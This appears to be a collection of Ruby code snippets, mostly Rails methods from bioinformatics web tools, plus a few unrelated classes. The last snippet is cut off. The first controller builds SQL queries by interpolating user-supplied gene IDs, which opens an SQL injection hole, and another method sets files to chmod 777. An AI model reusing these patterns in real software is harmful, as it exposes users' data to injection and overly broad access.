"def create\n @cla = Cla.new(cla_params)\n \n if current_user and params[:cla][:annot_id]\n\n orcid_user = current_user.orcid_user\n \n #complement attributes\n @annot = Annot.where(:id => params[:cla][:annot_id]).first\n list_cats = Basic.safe_parse_json(@annot.list_cat_json, [])\n @cat_idx = list_cats.index(@cla.cat)\n\n if @annot\n @cla.project_id = @annot.project_id\n @project = @annot.project\n @version =@project.version\n @h_env = Basic.safe_parse_json(@version.env_json, {})\n @annot_cell_set = AnnotCellSet.where(:annot_id => @annot.id, :cat_idx => @cat_idx).first\n @cell_set = CellSet.where(:id => @annot_cell_set.cell_set_id).first\n @all_annot_cell_sets = AnnotCellSet.where(:annot_id => @annot.id).all \n end\n @cla.user_id = (current_user) ? current_user.id : nil\n @cla.orcid_user_id = (ou = current_user.orcid_user) ? ou.id : nil\n @cla.cla_source_id = 1\n \n tmp_gene_ids = []\n if @h_env\n # tmp_gene_ids = Basic.@cla.genes.split(\",\").map{|e| e.}\n tmp_gene_ids = Basic.sql_query2(:asap_data, @h_env['asap_data_db_version'], 'genes', '', 'id', \"organism_id = #{@project.organism_id} and ensembl_id in (#{@cla.up_gene_ids.split(\",\").map{|e| \"'#{e}'\"}.join(\",\")})\")\n end\n @cla.up_gene_ids = tmp_gene_ids.map{|g| g.id}.uniq.join(\",\")\n \n tmp_gene_ids = []\n if @h_env\n # tmp_gene_ids = Basic.@cla.genes.split(\",\").map{|e| e.} \n tmp_gene_ids = Basic.sql_query2(:asap_data, @h_env['asap_data_db_version'], 'genes', '', 'id', \"organism_id = #{@project.organism_id} and ensembl_id in (#{@cla.down_gene_ids.split(\",\").map{|e| \"'#{e}'\"}.join(\",\")})\")\n end\n @cla.down_gene_ids = tmp_gene_ids.map{|g| g.id}.uniq.join(\",\")\n\n ## reorder ids\n up_gene_ids = (@cla.up_gene_ids) ? @cla.up_gene_ids.split(\",\") : []\n down_gene_ids = (@cla.down_gene_ids) ? @cla.down_gene_ids.split(\",\") : []\n sorted_up_gene_ids = (@cla.up_gene_ids) ? @cla.up_gene_ids.split(\",\").sort : []\n sorted_down_gene_ids = (@cla.down_gene_ids) ? @cla.down_gene_ids.split(\",\").sort : []\n \n h_gene_ids = {}\n gene_ids = up_gene_ids | down_gene_ids\n gene_ids.map{|e| h_gene_ids[e] = 1}\n\n cot_ids = (@cla.cell_ontology_term_ids) ? @cla.cell_ontology_term_ids.split(\",\") : []\n sorted_cot_ids = (@cla.cell_ontology_term_ids) ? @cla.cell_ontology_term_ids.split(\",\").sort : []\n \n h_cot_ids = {}\n cot_ids.map{|e| h_cot_ids[e] = 1}\n \n @cla.cell_ontology_term_ids = (cot_ids.size > 0) ? cot_ids.join(\",\") : \"\"\n @cla.sorted_cell_ontology_term_ids = (sorted_cot_ids.size > 0) ? sorted_cot_ids.join(\",\") : \"\"\n @cla.up_gene_ids = (up_gene_ids.size > 0) ? up_gene_ids.join(\",\") : \"\"\n @cla.down_gene_ids = (down_gene_ids.size > 0) ? down_gene_ids.join(\",\") : \"\"\n @cla.up_gene_ids = (sorted_up_gene_ids.size > 0) ? sorted_up_gene_ids.join(\",\") : \"\"\n @cla.down_gene_ids = (sorted_down_gene_ids.size > 0) ? sorted_down_gene_ids.join(\",\") : \"\"\n\n @cla.cell_set_id = @annot_cell_set.cell_set_id\n\n @errors = []\n \n #####check if cla already exists\n #h_cla = @cla.attributes\n #h_cla.delete(\"user_id\")\n if @cla.cell_ontology_term_ids != ''\n h_cla = {\n# :annot_id => @annot.id,\n :cell_set_id => @annot_cell_set.cell_set_id,\n # :cat => @cla.cat,\n # :genes => @cla.genes,\n :cell_ontology_term_ids => @cla.cell_ontology_term_ids\n }\n existing_cla = Cla.where(h_cla).first\n \n if existing_cla \n @errors.push(\"Annotation ##{existing_cla.num} in group \" + existing_cla.cat + \" has the same ontology terms.\")\n end\n\n end\n # if !existing_cla\n if @cla.name != ''\n h_cla = {\n# :annot_id => @annot.id,\n :cell_set_id => @annot_cell_set.cell_set_id,\n # :cat => @cla.cat,\n :name => @cla.name,\n :cell_ontology_term_ids => [\"\", nil]\n }\n existing_cla = Cla.where(h_cla).first\n if existing_cla\n @errors.push(\"Annotation ##{existing_cla.num} in group \" + existing_cla.cat + \" has the same name.\")\n end\n end\n # end\n \n # if ! existing_cla and ![\"\", nil].include? @cla.genes\n if @cla.up_gene_ids != '' or @cla.down_gene_ids != ''\n h_cla = {\n# :annot_id => @annot.id,\n :cell_set_id => @annot_cell_set.cell_set_id,\n # :cat => @cla.cat,\n :sorted_up_gene_ids => @cla.sorted_up_gene_ids,\n :sorted_down_gene_ids => @cla.sorted_down_gene_ids\n }\n existing_cla = Cla.where(h_cla).first\n if existing_cla\n @errors.push(\"Annotation ##{existing_cla.num} in group \" + existing_cla.cat + \" has the same gene lists (up and down).\")\n end\n end\n # end\n \n h_clas = {\n :by_cot_id => {},\n :by_gene_id => {}\n }\n all_clas = Cla.where(\n :cell_set_id => @cell_set.id #@all_annot_cell_sets.map{|e| e.cell_set_id}\n #:annot_id => @annot.id, :cat => @cla.cat\n ).all\n @cla.num = (all_clas.size > 0) ? (all_clas.map{|e| e.num}.sort.last+1) : 1\n \n @h_all_clas = {}\n all_clas.each do |cla|\n @h_all_clas[cla.id] = cla\n # tmp_up_gene_ids = (cla.up_gene_ids) ? cla.up_gene_ids.split(\",\") : []\n # tmp_cot_ids = (cla.cell_ontology_term_ids) ? cla.cell_ontology_term_ids.split(\",\") : []\n # tmp_up_gene_ids.map{|e| h_clas[:by_gene_id][e] ||= []; h_clas[:by_gene_id][e].push cla.id}\n # tmp_cot_ids.map{|e| h_clas[:by_cot_id][e] ||= []; h_clas[:by_cot_id][e].push cla.id} \n end\n \n @approaching_clas = {:cot_ids => [], :up_gene_ids => [], :down_gene_ids => []}\n @max_common = {:up_gene_ids => 0, :down_gene_ids => 0, :cot_ids => 0}\n if @errors.size == 0\n all_clas.each do |cla|\n if cla.sorted_up_gene_ids != @cla.sorted_up_gene_ids\n tmp_gene_ids = (cla.up_gene_ids and cla.up_gene_ids != '') ? cla.up_gene_ids.split(\",\") : []\n nber_common_gene_ids = (tmp_gene_ids.size >0) ? tmp_gene_ids.map{|e| h_gene_ids[e] || 0}.sum : 0\n if nber_common_gene_ids > @max_common[:up_gene_ids]\n @max_common[:up_gene_ids] = nber_common_gene_ids\n @approaching_clas[:up_gene_ids] = [cla.id]\n elsif nber_common_gene_ids == @max_common[:up_gene_ids]\n @approaching_clas[:up_gene_ids].push cla.id\n end\n end\n if cla.sorted_down_gene_ids != @cla.sorted_down_gene_ids\n tmp_gene_ids = (cla.down_gene_ids and cla.down_gene_ids != '') ? cla.down_gene_ids.split(\",\") : []\n nber_common_gene_ids = (tmp_gene_ids.size >0) ? tmp_gene_ids.map{|e| h_gene_ids[e] || 0}.sum : 0\n if nber_common_gene_ids > @max_common[:down_gene_ids]\n @max_common[:down_gene_ids] = nber_common_gene_ids\n @approaching_clas[:down_gene_ids] = [cla.id]\n elsif nber_common_gene_ids == @max_common[:down_gene_ids]\n @approaching_clas[:down_gene_ids].push cla.id\n end\n end\n \n if cla.sorted_cell_ontology_term_ids != @cla.sorted_cell_ontology_term_ids\n tmp_cot_ids = (cla.cell_ontology_term_ids and cla.cell_ontology_term_ids != '') ? cla.cell_ontology_term_ids.split(\",\") : []\n nber_common_cots = (tmp_cot_ids.size > 0) ? tmp_cot_ids.map{|e| h_cot_ids[e] || 0}.sum : 0\n if nber_common_cots > @max_common[:cot_ids]\n @max_common[:cot_ids] = nber_common_cots\n @approaching_clas[:cot_ids] = [cla.id]\n elsif nber_common_cots == @max_common[:cot_ids]\n @approaching_clas[:cot_ids].push cla.id\n end\n end\n end\n end\n \n @approaching_clas.each_key do |k|\n @approaching_clas[k].uniq!\n end\n \n # @cla.user_name = current_user.displayed_name\n @cla.user_id = current_user.id\n @cla.orcid_user_id = (orcid_user) ? orcid_user.id : nil\n \n respond_to do |format|\n if ((@max_common[:down_gene_ids] == 0 and @max_common[:up_gene_ids] == 0 and @max_common[:cot_ids] == 0) or params[:confirm] == '1') and @errors.size == 0 and @annot and @cla.save \n\n ## add vote\n cla_vote = ClaVote.where(:cla_id => @cla.id, :user_id => current_user.id).first\n \n h_vote = {\n :cla_id => @cla.id,\n :cla_source_id => 1,\n :agree => true,\n :user_id => current_user.id,\n :user_name => current_user.displayed_name,\n :orcid_user_id => (orcid_user) ? orcid_user.id : nil\n }\n \n logger.debug(\"add_cla_vote\")\n if cla_vote\n cla_vote.update_attributes(h_vote)\n else\n cla_vote = ClaVote.new(h_vote)\n cla_vote.save\n end\n\n @cla.update_attributes({:nber_agree => 1})\n \n ## init h_cat_info\n h_cat_info = Basic.safe_parse_json(@annot.cat_info_json, {})\n\n if !h_cat_info[\"nber_clas\"]\n h_cat_info = {\"nber_clas\" => [], \"selected_cla_ids\" => []}\n list_cats.each_index do |cat_i|\n h_cat_info[\"nber_clas\"][cat_i] = 0\n h_cat_info[\"selected_cla_ids\"][cat_i] = \"\"\n end\n h_cat_info[\"nber_clas\"][@cat_idx] = all_clas.size + 1\n end\n \n all_clas = Cla.where(:cell_set_id => @cla.cell_set_id\n #:annot_id => @annot.id, :cat => @cla.cat\n ).all\n selected_cla = all_clas.sort{|a, b| a.nber_agree - a.nber_disagree <=> b.nber_agree - b.nber_disagree}.last\n \n h_cat_info[\"selected_cla_ids\"][@cat_idx] = selected_cla.id if selected_cla\n @annot.update_attributes({:cat_info_json => h_cat_info.to_json})\n\n ## replaced by cell_set associated info\n @cell_set.update_attributes({:nber_clas => all_clas.size, :cla_id => selected_cla.id})\n \n # format.html { redirect_to @cla, notice: 'Cla was successfully created.' }\n format.html{ render :partial => 'create'}\n format.json { render :show, status: :created, location: @cla }\n else\n format.html { render :partial => 'create_error_or_warning' }\n format.json { render json: @cla.errors, status: :unprocessable_entity }\n end\n end\n end\n end",
"def initialize\n @annotation_schema = nil\n @schema_version = nil\n @sources = []\n @dictionaries = []\n\n @source_index = {}\n @div_index = {}\n @sentence_index = {}\n @token_index = {}\n end",
"def initialize(nation, megatonnage: 400, defcon: 5, sufddir: 0.0, inddir: 0.0,\n\t\t\t\t\t\t\t sacpop: 0, rad_level: 0, em_immunity: true,\n\t\t\t\t\t\t\t population: 300_000_000, accuracy: 0, score: 0, is_player: false)\n\n\t\t\t@nation = nation.to_s.upcase\n\t\t\t@sufddir = sufddir #suffering of death, destruction, and incapacitation of response\n\t\t\t@inddir = inddir #infliction of death, destruction, and incapacitation of response\n\t\t\t@defcon = defcon\n\t\t\t@sacpop = sacpop # strikes against civilian populations\n\t\t\t@megatonnage = megatonnage # distrubtion of megatonnage determined by mean-value theorem of integrals\n\t\t\t@rad_level = rad_level\n\t\t\t@em_immunity = em_immunity\n\t\t\t@population = population\n\t\t\t@accuracy = accuracy\n\t\t\t@score = score\n\t\t\t@targets_hit = Hash.new(0)\n\t\t\t@is_player = is_player\n\t\tend",
"def initializeDefaultParams()\n @fcName = nil # Flowcell name\n @baseCallsDir = nil # BaseCalls dir of the flowcell\n @useBasesMask = nil # Custom value to provide to BCL->FastQ convertor\n @sampleSheet = nil # Path to SampleSheet.csv\n yamlConfigFile = File.dirname(File.expand_path(File.dirname(__FILE__))) +\n \"/config/config_params.yml\" \n @configReader = YAML.load_file(yamlConfigFile)\n @queue = \"high\" # The processing queue on the cluster\n end",
"def taxon_params\n params.require(:taxon).permit(:common_name, :scientific_name, :ncbi_taxid, :user_id, :notes, :aliases, :restricted,\n genome_assemblies_attributes: [:id, :name, :alias, :accession, :release_date, :_destroy,\n genome_annotations_attributes: [:id, :name, :link, :index_link, :release_date,\n :_destroy]])\n end",
"def goannotation_params\n params.require(:goannotation).permit(:annotate)\n end",
"def initialize(alignments, widths = nil)\n @alignments = alignments\n @widths = widths\n end",
"def set_defaults\n self.annual_inflation_rate ||= 1.1\n self.pcnt_residual_value ||= 0\n self.condition_rollup_weight ||= 0\n end",
"def a3g_hypermut_seq_hash(seq_hash)\n #mut_hash number of apobec3g/f mutations per sequence\n mut_hash = {}\n hm_hash = {}\n out_hash = {}\n\n #total G->A mutations at apobec3g/f positions.\n total = 0\n\n #make specimen consensus\n ref = consensus_without_alignment(seq_hash.values)\n\n #obtain apobec3g positions and control positions\n apobec = apobec3gf(ref)\n mut = apobec[0]\n control = apobec[1]\n\n seq_hash.each do |k,v|\n a = 0 #muts\n b = 0 #potential mut sites\n c = 0 #control muts\n d = 0 #potenrial controls\n mut.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n a += 1\n b += 1\n else\n b += 1\n end\n end\n mut_hash[k] = a\n total += a\n\n control.each do |n|\n next if v[n] == \"-\"\n if v[n] == \"A\"\n c += 1\n d += 1\n else\n d += 1\n end\n end\n rr = (a/b.to_f)/(c/d.to_f)\n\n t1 = b - a\n t2 = d - c\n\n fet = Rubystats::FishersExactTest.new\n fisher = fet.calculate(t1,t2,a,c)\n perc = fisher[:twotail]\n info = k + \",\" + a.to_s + \",\" + b.to_s + \",\" + c.to_s + \",\" + d.to_s + \",\" + rr.round(2).to_s + \",\" + perc.to_s\n out_hash[k] = info\n if perc < 0.05\n hm_hash[k] = info\n end\n end\n\n if seq_hash.size > 20\n rate = total.to_f/(seq_hash.size)\n\n count_mut = count(mut_hash.values)\n maxi_count = count_mut.values.max\n\n poisson_hash = poisson_distribution(rate,maxi_count)\n\n cut_off = 0\n poisson_hash.each do |k,v|\n cal = seq_hash.size * v\n obs = count_mut[k]\n if obs >= 20 * cal\n cut_off = k\n break\n elsif k == maxi_count\n cut_off = maxi_count\n end\n end\n\n mut_hash.each do |k,v|\n if v > cut_off\n hm_hash[k] = out_hash[k]\n end\n end\n end\n\n hm_seq_hash = {}\n hm_hash.keys.each do |k|\n hm_seq_hash[k] = seq_hash[k]\n end\n return [hm_seq_hash,hm_hash]\nend",
"def initialize (params = {})\n @parent1 = params.fetch(:Parent1, 'parent 1 unknown')\n @parent2 = params.fetch(:Parent2, 'parent 2 unknown')\n @f2_wild = params.fetch(:F2_Wild, 'f2 wild unknown')\n @f2_p1 = params.fetch(:F2_P1, 'f2-p1 unknown')\n @f2_p2 = params.fetch(:F2_P2, 'f2-p2 unknown')\n @f2_p1p2 = params.fetch(:F2_P1P2, 'f2-p1p2 unknown')\n #I call the method linked genes, to check if the two genes represented in this object are linked\n linked_genes @parent1, @parent2, @f2_wild, @f2_p1, @f2_p2, @f2_p1p2\n @@hybridcross_array << self #Each time we add an object, it goes into gene_array\n end",
"def sequence_params\n params.require(:sequence).permit(:sample_id, :date_seq, :gene, :start, :end, :length, :sequence, :insertion, :subtype_code, :codon_start, :translation, :clonal, :provirus, :notes, :operator_id)\n end",
"def initialize (params = {})\n \n @prot_id = params.fetch(:prot_id, \"XXXXXX\") \n @intact_id = params.fetch(:intact_id, nil)\n @network = params.fetch(:network, nil)\n \n @@total_protein_objects[prot_id] = self\n \n if intact_id\n @@total_protwithintact_objects[intact_id] = self\n end \n \n end",
"def init_custom_fields\n @growth_rate = [0.0] * 8\n @msp = 0\n @capacities = []\n end",
"def initialize (params = {})\n \n @gene_id = params.fetch(:gene_id, 'Unknown_id')\n @accession = []\n @go = {}\n @kegg = []\n @intact = Array.new\n @kegg_pathway = {}\n \n @@my_genes << self #store the objects in the array\n \n end",
"def before_perform\n init\n\n @inputformat = params['informat'] ? params['informat'] : \"\"\n\n @colors = ['red', 'orange', 'yellow', 'darkgreen', 'green', 'lightblue', 'blue', 'violet', 'pink']\n #@colors = ['red', 'blue', 'yellow', 'darkgreen', 'pink', 'lightblue', 'orange', 'green', 'pink']\n\n @inputSequences = Array.new\n @inputTags = Array.new\n #@db_path = File.join(GCVIEW, 'tool.db')\n\n @db_path = File.join(DATABASES, 'gcview', 'tool.db')\n @show_number = params['show_number'] ? params['show_number'] : \"5\"\n @show_type = params['show_type'] ? params['show_type'] : \"genes\"\n @cut_off = params['evalue_cutoff'] ? params['evalue_cutoff'] : \"1e-3\"\n\n @input = @basename+\".in\"\n params_to_file(@input, 'sequence_input', 'sequence_file')\n @input_job = @basename+\".jin\"\n params_to_file(@input_job, 'jobid_input')\n #logger.debug \"Params seq inp: #{params.inspect}\"\n\n @input_jobid = false\n @input_sequence = false\n \n @outfile = @basename\n\n @configfile = @basename+\".conf\"\n\n @mainlog = job.statuslog_path\n\n @tmparray = Array.new\n @jobtype = Array.new\n @formerjob = ''\n \n if (params['sequence_input']!=nil || params['sequence_file']!=nil)\n if (@inputformat=='fas')\n check_fasta\n end\n\n if (@inputformat=='gi')\n check_GI\n end\n @input_sequence=true\n end\n\n if (params['jobid_input']!=nil)\n parse_sequencefile(@input_job)\n\n for i in 0..@inputSequences.length-1\n @inputSequences[i]=@inputSequences[i].gsub(/\\s+$/, '')\n end\n @input_jobid=true\n end\n\n if (@cut_off =~ /^e.*$/)\n @cut_off = \"1\" + @cut_off\n end\n\n\n\n # Angabe, wie viele Inputsequences bzw. JobIDs gegeben sind\n @inputSequences_length = @inputSequences.length\n logger.debug \"InputSequences Length: #{@inputSequences_length}\"\n\n logger.debug \"Input_Sequences (before_perform): #{@inputSequences.length} \"\n logger.debug \"tmparray (before_perform): #{@tmparray.length}\"\n logger.debug \"jobtype (before_perform): #{@jobtype.length}\"\n\n if (@inputSequences_length == 0)\n logfile = File.open(job.statuslog_path, \"w\")\n logfile.write(\"No valid input found -- Exiting...\")\n logfile.close \n self.status = STATUS_ERROR\n self.save!\n job.update_status\n raise \"No valid input found\" # just to be sure\n else\n write_configfile\n end\n\n #Check input format\n\n ### -> muss noch erledigt werden: jetzt allerdings Annahme, dass nur IDs eingegeben werden\n\n #if JobID: JobIDS getrennt ins Array @inputIDs speichern; Array-Laenge bestimmen\n\n #if (@inputformat=='jid')\n # 1) Testen, ob Jobs existieren und ob es sich um einen PsiblastJob handelt, dann in Array\n # einfuegen\n #-> erledigt: parse_sequencefile\n\n # 2) Arraylaenge bestimmen\n # @inputSequences_length = @inputSequences.length -> erledigt: in before_perform\n #if FASTA: bei Input einer Fasta-Sequenz gibt es nur ein Inputfile -> Array hat nur die Länge 1\n #else\n #Wird noch hinzugefuegt, allerdings erst nachdem der jid-Teil fertig ist ... .\n #end\n\n\n\n # Inputfiles aus den Psiblast-Tmp-Verzeichnissen holen + ins neue tmp-Verzeichnis speichern\n # -> für Anzahl der Psiblast-Jobs, die verwendet werden ... .\n #for (i=0; i<@inputSequences_length; i++)\n\n\n\n # 1) Input Format checken:\n # a) JobIDs: - IDs trennen\n # - Anzahl (nicht mehr als 10)\n # - IDs in ein Array schreiben und schauen, ob es diese ID überhaupt noch gibt\n # (Mysql Table zu JobID die MysqlID suchen, dann mit MysqlID im tmp-Verz.\n # schauen -> aehnlich Jobscard am li Rand)\n # -> Anzahl der Inputfiles richtet sich nach der Anzahl der JobIDs\n # b) FASTA: - Psiblast laufen lassen (ein Inputfile ...)\n # c) in Array abspeichern\n # 2) Arraylaenge der Inputfiles abspeichern\n end",
"def initialize(number_of_inputs, params = {})\n super(number_of_inputs)\n\n @learning_rate = params[:learning_rate] || 1\n @threshold = params[:threshold] || 2\n @max_attempts = 1000\n add_bias(1)\n end",
"def initialize(id, centerMax, standardDeviations)\n g = GaussianGenerator.new\n @id = id\n @ppm = centerMax * rand\n @params = standardDeviations.map {|sd| g.next(0,sd)}\n end",
"def setup_propositions(params)\n self.params = {\n sigla: params[:sigla], numero: params[:numero], ano: params[:ano], datApresentacaoIni: params[:datApresentacaoIni],\n generoAutor: params[:generoAutor], datApresentacaoFim: params[:datApresentacaoFim], parteNomeAutor: params[:parteNomeAutor],\n idTipoAutor: params[:idTipoAutor], siglaUFAutor: params[:siglaUFAutor], codEstado: params[:codEstado],\n codOrgaoEstado: params[:codOrgaoEstado], emTramitacao: params[:emTramitacao], siglaPartidoAutor: params[:siglaPartidoAutor]\n }\n end",
"def initialize\n @amplitude = {}\n @mixpanel = {}\n @appmetrica = {}\n @appsflyer = {}\n end",
"def initialize(options = {})\n super\n @spamassassin_threshold = options[:spamassassin_threshold] || 5\n end",
"def post_initialize(params)\n @planner_color_1 = params[:planner_color_1] || ::DotGrid::Color.new(\"CCCCCC\")\n @planner_color_2 = params[:planner_color_2] || ::DotGrid::Color.new(\"0099FF\")\n @grid_color = params[:grid_color] || ::DotGrid::Color.new(\"B3B3B3\")\n @dot_weight = params[:dot_weight] || 1.5\n @spacing = params[:spacing] ? params[:spacing].mm : 5.mm\n add_pattern(::DotGrid::Pattern::SquareGrid.new(params.merge!(:bounds => square_grid_bounds, grid_color: @planner_color_1)))\n add_pattern(::DotGrid::Pattern::DotGrid.new(params.merge!(:bounds => dot_grid_bounds)))\n end",
"def default_operation_params\n {\n tr_96_384_program: '96_to_384_sample',\n tr_96_384_robot: Biomek::MODEL\n }\n end",
"def before_perform \n # Init file vars \n\t @basename = File.join(job.job_dir, job.jobid)\n @infile = @basename+\".fasta\"\n @outfile = @basename+\".csblast\"\n \n # Save either the pasted Sequence from frontend or uploaded Sequence File to in file\n params_to_file(@infile, 'sequence_input', 'sequence_file')\n @informat = params['informat'] ? params['informat'] : 'fas'\n # Reformat the input sequence to match fasta format (perl script call)\n reformat(@informat, \"fas\", @infile)\n # necessary for resubmitting domains via slider\n\t File.copy(@infile, @basename+\".in\")\t\n \n # init cmd container\n @commands = []\n\n # init frontend params\n @inputmode = params['inputmode']\n @expect = params['evalue']\n @filter = params['filter'] ? 'T' : 'F'\n @mat_param = params['matrix']\n @other_advanced = params['otheradvanced']\n @descriptions = params['descr']\n @alignments = params['alignments']\n @db_path = params['std_dbs'].nil? ? \"\" : params['std_dbs'].join(' ')\n @db_path = params['user_dbs'].nil? ? @db_path : @db_path + ' ' + params['user_dbs'].join(' ')\n \n @ungapped_alignment = params['ungappedalign'] ? 'F' : 'T'\n @e_thresh = params['evalfirstit']\n @smith_wat = params['smithwat'] ? 'T' : 'F'\n @rounds = params['rounds']\n @fastmode = params['fastmode'] ? 'T' : 'F'\n @alignment = \"\"\n \n # init genome db parameter\n # getDBs is part of the GenomesModule\n gdbs = getDBs('pep')\n logger.debug(\"SELECTED GENOME DBS\\n\")\n logger.debug gdbs.join(\"\\n\")\n @db_path += ' ' + gdbs.join(' ')\n\n\n # Write confidence parameter to file in temp directory\n File.open(@basename + \".csiblast_conf\", \"w\") do |file|\n file.write(@e_thresh)\n end\n # set file rights ugo+rxw\n system(\"chmod 777 #{@basename}.csiblast_conf\")\n # if input is alignment call method process_alignment\n if (@inputmode == \"alignment\") then process_alignment end\n\n # set gapopen and gapextend costs depending on given matrix\n # default values\n @gapopen = 11\n @gapext = 1\n if (@mat_param =~ /BLOSUM80/i || @mat_param =~ /PAM70/i) then @gapopen = 10 end\n if (@mat_param =~ /PAM30/i) then @gapopen = 9 end\n if (@mat_param =~ /BLOSUM45/i) \n @gapopen = 15\n @gapext = 2\n end \n \n end",
"def calc_global_stats()\n\n #common set of genes\n \n core_genes_ids = [110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216]\n \n self.genes_core = Gene.find(:all, :conditions => { :id => core_genes_ids })\n self.genes_all = Gene.find(:all)\n #puts \"genes: #{genes.inspect}\"\n\n self.taxons_cnt = NcbiSeqsTaxon.count(:distinct => true)\n puts \"taxons_cnt: #{taxons_cnt}\"\n\n\n #img_tot_cnt\n self.itc_hsh = ProkGroup.find(:all) \\\n .each_with_object({ }){ |c, hsh| hsh[c.id] = c.img_tot_cnt }\n\n\n #prok group taxon number\n #all small n as constant\n #self.pgtn_hsh = Taxon.joins(:ncbi_seqs_taxon) \\\n # .joins(:taxon_group) \\\n # .group(\"prok_group_id\") \\\n # .select(\"prok_group_id, count(*) as cnt\") \\\n # .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n\n self.pgtn_hsh_core = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n\t\t\t\t\t where gbs.GENE_ID in (110,111,112,113,114,115,119,123,136,137,138,139,140,141,149,154,156,157,159,164,168,181,182,183,184,186,193,195,196,199,202,204,206,216)\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\nself.pgtn_hsh_all = Taxon.find_by_sql(\"select pg.ID as prok_group_id,\n nvl(t2.cnt,0) as cnt\nfrom PROK_GROUPS pg\nleft outer join \n(\nselect pg.id, count(*) as cnt\nfrom PROK_GROUPS pg\n join TAXON_GROUPS tg on tg.PROK_GROUP_ID = pg.ID\n join NCBI_SEQS_TAXONS nst on nst.TAXON_ID = tg.TAXON_ID\nwhere nst.TAXON_ID in (select distinct tx.ID\n from taxons tx\n\t\t\t\t\t join NCBI_SEQS ns on ns.TAXON_ID = tx.ID\n\t\t\t\t\t join GENE_BLO_SEQS gbs on gbs.NCBI_SEQ_ID = ns.id\n\t\t\t\t\t join taxon_groups tg on tg.TAXON_ID = tx.ID\n)\ngroup by pg.id\n) t2 on t2. id = pg.id \n\").each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n \n \n \n #puts @pgtn_hsh.inspect\n\n #prok group sequence number\n #find nb of sequences in group\n #debug\n #Rails.logger.level = 0 # at any time\n self.pgsn_hsh_all = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt }\n \n self.pgsn_hsh_core = Taxon.joins(:ncbi_seq => :gene_blo_seq) \\\n .joins(:taxon_group) \\\n .where({ \"GENE_BLO_SEQS.gene_id\" => core_genes_ids }) \\\n .group(\"prok_group_id\") \\\n .select(\"prok_group_id, sum(weight_pg) as cnt\") \\\n .each_with_object({ }){ |c, hsh| hsh[c.prok_group_id] = c.cnt.to_f }\n\n \n #puts @pgsn_hsh.inspect\n \n \n #exit(0)\n #debug\n #Rails.logger.level = 2 # at any time\n\n\n end",
"def start_setup\n\t\tread_config()\n\n\t\tputs \"Initializing annotation for project: #{self.project_file_name} ...\"\n\t\tputs \"=================================\"\n\n\t\tif add_annotation_target()\n\t\t\tputs \"=================================\"\n\t\t\tputs \"Annotation initialization for project #{self.project_file_name} done.(●'◡'●)ノ♥\"\n\t\tend\n\tend",
"def initialize(protname_length_pairs, condition_to_count_array)\n @protname_length_pairs = protname_length_pairs\n @condition_to_count_array = condition_to_count_array\n end",
"def initialize(instr = NYLON_ACOUSTIC, \n tuning = EADGBE,\n bpm = 140, # sounds okay with \n note = \"eighth\") # most tabs...\n @tuning = tuning\n @seq = MIDI::Sequence.new\n @seq.tracks << (ctrack = MIDI::Track.new(@seq))\n @seq.tracks << (@track = MIDI::Track.new(@seq))\n @note = note\n\n @notes = { 's' => 'sixteenth', 'e' => 'eighth', 'q' => 'quarter', 'h' => 'half', 'w' => 'whole' }\n\n ctrack.events << MIDI::Tempo.new(MIDI::Tempo.bpm_to_mpq(bpm))\n ctrack.events << MIDI::ProgramChange.new(0,instr,0)\n ctrack.events << MIDI::ProgramChange.new(1,instr,0)\n ctrack.events << MIDI::ProgramChange.new(2,instr,0)\n ctrack.events << MIDI::ProgramChange.new(3,instr,0)\n ctrack.events << MIDI::ProgramChange.new(4,instr,0)\n ctrack.events << MIDI::ProgramChange.new(5,instr,0)\n\n @prev = [nil] * 6\n @prev_dist = [0] * 6\n end",
"def initialize(params)\n @byr = params['byr']&.to_i\n @iyr = params['iyr']&.to_i\n @eyr = params['eyr']&.to_i\n if params.key?('hgt')\n @hgt = if (md = /\\A(?<value>\\d+)(?<unit>cm|in)\\z/.match(params['hgt']))\n [md['value'].to_i, md['unit']]\n else\n params['hgt']\n end\n end\n\n @hcl = params['hcl']\n @ecl = params['ecl']\n @pid = params['pid']\n @cid = params['cid']\n end",
"def fix_gags(hash_of_sequence_ids_to_sequence_strings, sequence_id_to_gags={})\n log = Bio::Log::LoggerPlus['bio-gag']\n \n # Get the gags\n if sequence_id_to_gags == {}\n log.info \"Predicting gags from the pileup\"\n gags do |gag|\n sequence_id_to_gags[gag.ref_name] ||= []\n sequence_id_to_gags[gag.ref_name].push gag\n end\n else\n log.info \"Using pre-specified GAG errors\"\n end\n log.info \"Found #{sequence_id_to_gags.values.flatten.length} gag errors to fix\"\n \n # Make sure all gag errors in the pileup map to a sequence input fasta file by keeping tally\n accounted_for_seq_ids = []\n fixed_sequences = {} #Hash of sequence ids to sequences without gag errors\n hash_of_sequence_ids_to_sequence_strings.each do |seq_id, seq|\n log.debug \"Now attempting to fix sequence #{seq_id}, sequence #{seq}\"\n toilet = sequence_id_to_gags[seq_id]\n if toilet.nil?\n # No gag errors found in this sequence (or pessimistically the sequence wasn't in the pileup -leaving that issue to the user though)\n fixed_sequences[seq_id] = seq\n else\n # Gag error found at least once somewhere in this sequence\n # Record that this was touched in the pileup\n accounted_for_seq_ids.push seq_id\n \n # Output the fixed-up sequence\n last_gag = 0\n fixed = ''\n toilet.sort{|a,b| a.position<=>b.position}.each do |gag|\n #log.debug 